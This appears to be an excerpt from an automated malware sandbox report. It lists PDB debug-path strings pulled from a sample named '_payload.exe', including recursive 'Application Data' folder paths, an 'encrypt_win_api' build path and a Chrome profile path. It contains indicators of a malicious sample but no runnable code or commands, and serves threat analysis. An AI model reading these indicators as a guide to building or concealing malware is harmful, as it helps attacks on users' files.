              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2299664958.0000000003C03000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\\ source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2285406721.0000000003BDB000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2284252311.0000000003BC3000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\e\#^m0 source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2241580855.00000000037BC000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2243108340.00000000037E0000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2219190417.00000000037BC000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2220175784.00000000037D5000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\p\D source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2218928019.0000000003924000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2241431328.000000000393D000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2193290817.00000000038EE000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2220505539.000000000392F000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2218644067.00000000038EA000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2218928019.0000000003924000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2241431328.000000000393D000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2193290817.00000000038EE000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2220505539.000000000392F000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2218644067.00000000038EA000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\\c source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2299293473.0000000003C9E000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2290618686.000000000339D000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2284691080.000000000338E000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2285082947.0000000003395000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2283843769.0000000003366000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2291745039.00000000033A6000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\e\*a\ source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2284691080.000000000338E000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2285082947.0000000003395000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2283843769.0000000003366000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2286049396.00000000033AE000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2286088788.00000000033B2000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\l source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2303570677.000000000394C000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2306593926.000000000393F000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2302847985.000000000394C000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\e\\bi source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2250283430.000000000386A000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2252822948.0000000003874000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\e\e\ source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2289759297.00000000037FF000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2290952465.0000000003817000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\3 source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2219190417.00000000037BC000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2219510848.00000000037F4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\Ap source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2242070892.000000000339F000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2241962914.0000000003368000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\\w source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2289759297.00000000037FF000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2290952465.0000000003817000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\h source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2303833195.0000000003CFF000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb.tgvva source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2193290817.0000000003868000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ewy\\n D source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2313169253.0000000003979000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2309346506.0000000003969000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\fnU source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2241580855.00000000037BC000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2193886000.00000000037DA000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2193703978.00000000037BE000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2242013730.00000000037F4000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2219190417.00000000037BC000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2219510848.00000000037F4000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2242573181.00000000037F8000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb.tgvv source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2193290817.00000000038EE000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2242821627.0000000003B3B000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\\ros source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2193832137.000000000339F000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2193661261.000000000338E000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\* source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2219190417.00000000037BC000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2219510848.00000000037F4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\GPUCache\.pdb\a\Adobe source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2313304101.0000000003C23000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2309605483.0000000003C03000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\b source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2261225726.0000000003986000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2261008047.0000000003961000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2283443210.0000000003913000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2283524784.0000000003986000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb\TempState\h source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2193490416.0000000003889000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2193290817.0000000003868000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2290160289.0000000003C22000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2285406721.0000000003C26000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\J source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2299293473.0000000003C9E000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\X source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2299293473.0000000003C9E000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\p\- source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2251080691.0000000003961000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2241819824.000000000396A000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2241431328.0000000003961000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2242783147.0000000003976000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2250283430.0000000003961000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2253471637.0000000003986000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2284103523.00000000037C0000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2291587000.00000000037C8000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2261492169.00000000037C0000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2290747950.00000000037C8000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\e\* source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2241819824.0000000003999000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2242648733.0000000003999000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2299664958.0000000003C03000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2290353471.0000000003C82000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\L source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2193832137.000000000339F000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2193661261.000000000338E000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb`6 source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2193290817.00000000038EE000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2242821627.0000000003B57000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2253587616.0000000003B4B000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: ad_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\a\\ source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2283575047.000000000395A000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2283443210.0000000003913000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\ source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.1923906292.0000000003366000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\he\= source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2218928019.0000000003924000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2241431328.000000000393D000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2193290817.00000000038EE000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2220505539.000000000392F000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2218644067.00000000038EA000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2262926457.0000000003C05000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2285406721.0000000003BDB000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2284252311.0000000003BC3000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\C:\U source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2193832137.000000000339F000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.1960744215.0000000003391000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2193661261.000000000338E000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\\ source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2241431328.000000000393D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2218928019.0000000003924000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2193290817.00000000038EE000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2220505539.000000000392F000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2218644067.00000000038EA000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\we\ source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2241580855.00000000037BC000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2242273475.0000000003864000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2242013730.00000000037F4000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2242219779.0000000003807000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\s source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2284786483.000000000388C000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2261008047.0000000003881000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2285842625.00000000038B9000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2285127937.0000000003899000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\" source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2299293473.0000000003C9E000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\x source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2253587616.0000000003B92000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2262926457.0000000003BA3000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2261615896.0000000003B92000.00000004.00000020.00020000.00000000.sdmp
